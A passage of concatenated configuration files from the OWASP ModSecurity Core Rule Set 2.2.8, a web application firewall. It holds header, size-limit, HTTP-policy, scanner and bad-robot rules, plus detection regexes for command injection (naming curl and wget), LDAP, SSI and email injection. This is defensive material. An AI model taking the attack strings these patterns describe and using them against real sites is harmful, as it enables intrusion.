"t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" SecMarker END_ACCEPT_CHECK # # Missing/Empty User-Agent Header # # -=[ Rule Logic ]=- # These rules will first check to see if a User-Agent header is present. # The second check is to see if a User-Agent header exists but is empty. # SecMarker BEGIN_UA_CHECK SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ "skipAfter:END_UA_CHECK,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Missing a User Agent Header',id:'960009',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'5',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent "^$" \ "phase:2,t:none,block,msg:'Empty User Agent Header',id:'960006',rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA',severity:'5',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" SecMarker END_UA_CHECK # # Missing Content-Type Header with Request Body # # -=[ Rule Logic ]=- # These rules will first check to see if a Content-Type header is missing. # The second check is to see if a Content-Length header is present and is # not empty or contains a 0. If the Content-Length header contains other data # than this means that there is a request body and the RFC states that there # MUST be a Content-Type header so that the app knows how to parse the data. # SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ "chain,phase:1,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Containing Content, but Missing Content-Type header',id:'960904',severity:'5'" SecRule REQUEST_HEADERS:Content-Length "!^0$" "t:none,ctl:forceRequestBodyVariable=On,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" # Check that the host header is not an IP address # This is not an HTTP RFC violation but it is indicative of automated client access. # Many web-based worms propagate by scanning IP address blocks. # # -=[ Rule Logic ]=- # This rule triggers if the Host header contains all digits (and possible port) # # -=[ References ]=- # http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx # SecRule REQUEST_HEADERS:Host "^[\d.:]+$" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Host header is a numeric IP address',logdata:'%{matched_var}',severity:'4',id:'960017',tag:'OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',tag:'http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/IP_HOST-%{matched_var_name}=%{matched_var}" # Log a security event when the request is rejected by apache # # You must patch mod_unique_id for this to work correctly. See the following # mod-security-users mail-list post for the patch details - # http://article.gmane.org/gmane.comp.apache.mod-security.user/5808 # #SecRule RESPONSE_STATUS ^400$ "t:none,phase:5,chain,pass,msg:'Invalid request',id:'960913',severity:'4'" #SecRule WEBSERVER_ERROR_LOG !ModSecurity "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.leakage_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{matched_var}" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_23_request_limits.conf����������0000664�0000000�0000000�00000007320�12164572564�0032374�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # In most cases, you should expect a certain volume of each a request on your # website. For example, a request with 400 arguments, can be suspicious. # This file creates limitations on the request. # # TODO Look at the rules in this file, and define the sizes you'd like to enforce. # Note that most of the rules are commented out by default. # Uncomment the rules you need # ## -- Arguments limits -- # Limit argument name length SecRule &TX:ARG_NAME_LENGTH "@eq 1" "chain,phase:2,t:none,block,msg:'Argument name too long',id:'960209',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" "t:none,t:length,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" # Limit value name length SecRule &TX:ARG_LENGTH "@eq 1" "chain,phase:2,t:none,block,msg:'Argument value too long',id:'960208',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule ARGS "@gt %{tx.arg_length}" "t:none,t:length,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" # Maximum number of arguments in request limited SecRule &TX:MAX_NUM_ARGS "@eq 1" "chain,phase:2,t:none,block,msg:'Too many arguments in request',id:'960335',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule &ARGS "@gt %{tx.max_num_args}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" # Limit arguments total length SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" "chain,phase:2,t:none,block,msg:'Total arguments size exceeded',id:'960341',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" ## -- File upload limits -- # Individual file size is limited SecRule &TX:MAX_FILE_SIZE "@eq 1" "chain,phase:1,t:none,block,msg:'Uploaded file size too large',id:'960342',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule REQUEST_HEADERS:Content-Type "@beginsWith multipart/form-data" "chain" SecRule REQUEST_HEADERS:Content-Length "@gt %{tx.max_file_size}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" # Combined file size is limited SecRule &TX:COMBINED_FILE_SIZES "@eq 1" "chain,phase:2,t:none,block,msg:'Total uploaded files size too large',id:'960343',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_30_http_policy.conf�������������0000664�0000000�0000000�00000015425�12164572564�0031664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # HTTP policy enforcement # The HTTP policy enforcement rule set sets limitations on the use of HTTP by clients. # Few applications require the breadth and depth of the HTTP protocol. On the # other hand many attacks abuse valid but rare HTTP use patterns. Restricting # HTTP protocol usage is effective in therefore effective in blocking many # application layer attacks. # # TODO Many automation programs use non standard HTTP requests. While you may # want to allow some of those, try not to create exceptions only for the # automated program based on properties such as their source IP address or # the URL they access. # # allow request methods # # TODO Most applications only use GET, HEAD, and POST request # methods. If that is not the case with your environment, you are advised # to edit the line or uncomment it. # SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" "phase:1,t:none,block,msg:'Method is not allowed by policy',logdata:'%{matched_var}',severity:'2',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960032',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}" # Restrict which content-types we accept. # # TODO Most applications support only two types for request bodies # because that is all browsers know how to produce. If you are using # automated tools to talk to the application you may be using other # content types and would want to change the list of supported types. # # Note though that ModSecurity parses only three content types: # application/x-www-form-urlencoded, multipart/form-data request and # text/xml. The protection provided for any other type is inferior. # # TODO There are many applications that are not using multipart/form-data # types (typically only used for file uploads). This content type # can be disabled if not used. # # NOTE We allow any content type to be specified with GET or HEAD # because some tools incorrectly supply content type information # even when the body is not present. There is a rule further in # the file to prevent GET and HEAD requests to have bodies to we're # safe in that respect. # # NOTE Use of WebDAV requires "text/xml" content type. # # NOTE Philippe Bourcier (pbourcier AT citali DOT com) reports # applications running on the PocketPC and AvantGo platforms use # non-standard content types: # # M-Business iAnywhere application/x-mal-client-data # UltraLite iAnywhere application/octet-stream # SecRule REQUEST_METHOD "!^(?:GET|HEAD|PROPFIND|OPTIONS)$" "phase:1,chain,t:none,block,msg:'Request content type is not allowed by policy',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960010',tag:'OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED',tag:'WASCTC/WASC-20',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/EE2',tag:'PCI/12.1',severity:'2',logdata:'%{matched_var}'" SecRule REQUEST_HEADERS:Content-Type "^([^;\s]+)" "chain,capture" SecRule TX:0 "!^%{tx.allowed_request_content_type}$" "t:none,ctl:forceRequestBodyVariable=On,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/CONTENT_TYPE_NOT_ALLOWED-%{matched_var_name}=%{matched_var}" # Restrict protocol versions. # # TODO All modern browsers use HTTP version 1.1. For tight security, allow only # this version. # # NOTE Automation programs, both malicious and non malicious many times use # other HTTP versions. If you want to allow a specific automated program # to use your site, try to create a narrower expection and not allow any # client to send HTTP requests in a version lower than 1.1 # SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" "phase:2,t:none,block,msg:'HTTP protocol version is not allowed by policy',severity:'2',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960034',tag:'OWASP_CRS/POLICY/PROTOCOL_NOT_ALLOWED',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.10',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/PROTOCOL_NOT_ALLOWED-%{matched_var_name}=%{matched_var}" # Restrict file extension # # TODO the list of file extensions below are virtually always considered unsafe # and not in use in any valid program. If your application uses one of # these extensions, please remove it from the list of blocked extensions. # You may need to use ModSecurity Core Rule Set Templates to do so, otherwise # comment the whole rule. # SecRule REQUEST_BASENAME "\.(.*)$" "chain,capture,setvar:tx.extension=.%{tx.1}/,phase:2,t:none,t:urlDecodeUni,t:lowercase,block,msg:'URL file extension is restricted by policy',severity:'2',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960035',tag:'OWASP_CRS/POLICY/EXT_RESTRICTED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',logdata:'%{TX.0}'" SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/EXT_RESTRICTED-%{matched_var_name}=%{matched_var}" # Restricted HTTP headers # # TODO the list of HTTP headers below are considered unsafe for your environment. # If your application uses one of these directories, please remove it from # the list of blocked extensions. You may need to use ModSecurity Core Rule # Set Templates to do so, otherwise comment the whole rule. # SecRule REQUEST_HEADERS_NAMES "^(.*)$" "chain,phase:2,t:none,block,msg:'HTTP header is restricted by policy',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960038',tag:'OWASP_CRS/POLICY/HEADER_RESTRICTED',tag:'OWASP_CRS/POLICY/FILES_NOT_ALLOWED',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/12.1',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A7',tag:'PCI/12.1',severity:'4',logdata:'%{matched_var}',capture,setvar:'tx.header_name=/%{tx.0}/'" SecRule TX:HEADER_NAME "@within %{tx.restricted_headers}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/HEADERS_RESTRICTED-%{matched_var_name}=%{matched_var}" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_35_bad_robots.conf��������������0000664�0000000�0000000�00000012442�12164572564�0031445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # NOTE Bad robots detection is based on checking elements easily # controlled by the client. As such a determined attacked can bypass # those checks. Therefore bad robots detection should not be viewed as # a security mechanism against targeted attacks but rather as a nuisance # reduction, eliminating most of the random attacks against your web # site. SecRule REQUEST_HEADERS:User-Agent "@pmFromFile modsecurity_35_scanners.data" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,block,msg:'Request Indicates a Security Scanner Scanned the Site',logdata:'%{matched_var}',id:'990002',tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS_NAMES "\bacunetix-product\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,block,msg:'Request Indicates a Security Scanner Scanned the Site',logdata:'%{matched_var}',id:'990901',tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_FILENAME "@pm nessustest appscan_fingerprint" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,block,msg:'Request Indicates a Security Scanner Scanned the Site',logdata:'%{matched_var}',id:'990902',tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent "@pmFromFile modsecurity_35_bad_robots.data" \ "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Rogue web site crawler',id:'990012',tag:'OWASP_CRS/AUTOMATION/MALICIOUS',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'4',capture,logdata:'%{TX.0}'" SecRule REQUEST_HEADERS:User-Agent "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by mail)|(?:(?:altb|ro)o|bandi)t|emailextract?|vulnscan|mole)|lls search ii|p Search 00)|i(?:ndows(?:-update-agent)|se(?:nut)?bot)|ordpress(?: hash grabber|\/4\.01)|3mir)|m(?:o(?:r(?:feus fucking scanner|zilla)|zilla\/3\.mozilla\/2\.01$|siac 1.)|i(?:crosoft (?:internet explorer\/5\.0$|url control)|ssigua)|ailto:craftbot\@yahoo\.com|urzillo compatible)|p(?:ro(?:gram shareware 1\.0\.|duction bot|webwalker)|a(?:nscient\.com|ckrat)|oe-component-client|s(?:ycheclone|urf)|leasecrawl\/1\.|cbrowser|e 1\.4|mafind)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|(siphon|spider)|siphon|wolf)|(?:collecto|irgrabbe)r|ducate search vxb|xtractorpro|o browse)|t(?:(?: ?h ?a ?t ?' ?s g ?o ?t ?t ?a ? h ?u ?r ?|his is an exploi|akeou)t|oata dragostea mea pentru diavola|ele(?:port pro|soft)|uring machine)|a(?:t(?:(?:omic_email_hunt|spid)er|tache|hens)|d(?:vanced email extractor|sarobot)|gdm79\@mail\.ru|miga-aweb\/3\.4|utoemailspider| href=)|^(?:(google|i?explorer?\.exe|(ms)?ie( [0-9.]+)?\ ?(compatible( browser)?)?)$|www\.weblogs\.com|(?:jakart|vi)a|microsoft url|user-Agent)|s(?:e(?:archbot admin@google.com|curity scan)|(?:tress tes|urveybo)t|\.t\.a\.l\.k\.e\.r\.|afexplorer tl|itesnagger|hai)|n(?:o(?:kia-waptoolkit.* googlebot.*googlebot| browser)|e(?:(?:wt activeX; win3|uralbot\/0\.)2|ssus)|ameofagent|ikto)|f(?:a(?:(?:ntombrows|stlwspid)er|xobot)|(?:ranklin locato|iddle)r|ull web bot|loodgate|oobar/)|i(?:n(?:ternet(?: (?:exploiter sux|ninja)|-exprorer)|dy library)|sc systems irc search 2\.1)|g(?:ameBoy, powered by nintendo|rub(?: crawler|-client)|ecko\/25)|(myie2|libwen-us|murzillo compatible|webaltbot|wisenutbot)|b(?:wh3_user_agent|utch__2\.1\.1|lack hole|ackdoor)|d(?:ig(?:imarc webreader|out4uagent)|ts agent)|(?:(script|sql) inject|$botname/$botvers)ion|(msie .+; .*windows xp|compatible \; msie)|h(?:l_ftien_spider|hjhj@yahoo|anzoweb)|(?:8484 boston projec|xmlrpc exploi)t|u(?:nder the rainbow 2\.|ser-agent:)|(sogou develop spider|sohu agent)|(?:(?:d|e)browse|demo bot)|zeus(?: .*webster pro)?|[a-z]surf[0-9][0-9]|v(?:adixbot|oideye)|larbin@unspecified|\bdatacha0s\b|kenjin spider|; widows|rsync|\\\r))" "capture,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}" SecMarker END_ROBOT_CHECK ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_40_generic_attacks.conf���������0000664�0000000�0000000�00000047765�12164572564�0032471�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # OS Command Injection Attacks # # -=[ Rule Logic ]=- # These rules look for attempts to access OS commands such as curl, wget and cc # These commands are often used in injection attacks to force the victim web # application to initiate a connection out to a hacker site to download, compile # and install malicious toolkits such as those to participate in Botnets. # # -=[ References ]=- # http://projects.webappsec.org/OS-Commanding # http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:[\;\|\`]\W*?\bcc|\b(wget|curl))\b|\/cc(?:[\'\"\|\;\`\-\s]|$))" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',capture,t:none,t:normalisePath,ctl:auditLogParts=+E,block,msg:'System Command Injection',id:'950907',tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',tag:'WASCTC/WASC-31',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_COMMAND_INJECTION1" SecMarker END_COMMAND_INJECTION1 # # -=[ Heuristic Checks ]=- # # [ Repeatative Non-Word Chars ] # # This rule attempts to identify when multiple (4 or more) non-word characters are repeated in sequence # SecRule ARGS "\W{4,}" "phase:2,capture,t:none,t:urlDecodeUni,block,id:'960024',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'8',msg:'Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.msg=%{rule.msg}',setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0}" # # Coldfusion Injection # # -=[ Rule Logic ]=- # These rules look for the existence of undocumented ColdFusion Admin functions on input # # -=[ References ]=- # http://www.adobe.com/devnet/security/security_zone/asb99-10.html # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "\bcf(?:usion_(?:d(?:bconnections_flush|ecrypt)|set(?:tings_refresh|odbcini)|getodbc(?:dsn|ini)|verifymail|encrypt)|_(?:(?:iscoldfusiondatasourc|getdatasourceusernam)e|setdatasource(?:password|username))|newinternal(?:adminsecurit|registr)y|admin_registry_(?:delete|set)|internaldebug|execute)\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'Injection of Undocumented ColdFusion Tags',id:'950008',tag:'OWASP_CRS/WEB_ATTACK/CF_INJECTION',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/CF_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_CF_INJECTION" SecMarker END_CF_INJECTION # # LDAP Injection # # -=[ Rule Logic ]=- # These rules look for common LDAP data constructions. # # -=[ References ]=- # http://technet.microsoft.com/en-us/library/aa996205%28EXCHG.65%29.aspx # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\((?:\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\b\W*?=|[^\w\x80-\xFF]*?[\!\&\|][^\w\x80-\xFF]*?\()|\)[^\w\x80-\xFF]*?\([^\w\x80-\xFF]*?[\!\&\|])" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'LDAP Injection Attack',id:'950010',tag:'OWASP_CRS/WEB_ATTACK/LDAP_INJECTION',tag:'WASCTC/WASC-29',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/LDAP_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_LDAP_INJECTION" SecMarker END_LDAP_INJECTION # # SSI injection # # -=[ Rule Logic ]=- # These rules look for common Server-Site Include format data on input. # # -=[ References ]=- # http://projects.webappsec.org/SSI-Injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'SSI injection Attack',id:'950011',tag:'OWASP_CRS/WEB_ATTACK/SSI_INJECTION',tag:'WASCTC/WASC-36',tag:'OWASP_TOP_10/A1',tag:'PCI/6.5.2',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SSI_INJECTION-%{matched_var_name}=%{tx.0},skipAfter:END_SSI_INJECTION" SecMarker END_SSI_INJECTION # # UPDF XSS # # -=[ Rule Logic ]=- # This rule looks for a link being submitted that contains the # fragment in a query_string. # # -=[ References ]=- # http://www.modsecurity.org/projects/modsecurity/apache/feature_universal_pdf_xss.html # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "http:\/\/[\w\.]+?\/.*?\.pdf\b[^\x0d\x0a]*#" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Universal PDF XSS URL Detected.',id:'950018',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/UPDF_XSS-%{matched_var_name}=%{tx.0}" # # Email Injection # # -=[ References ]=- # http://projects.webappsec.org/Mail-Command-Injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[\n\r]\s*\b(?:to|b?cc)\b\s*:.*?\@" \ 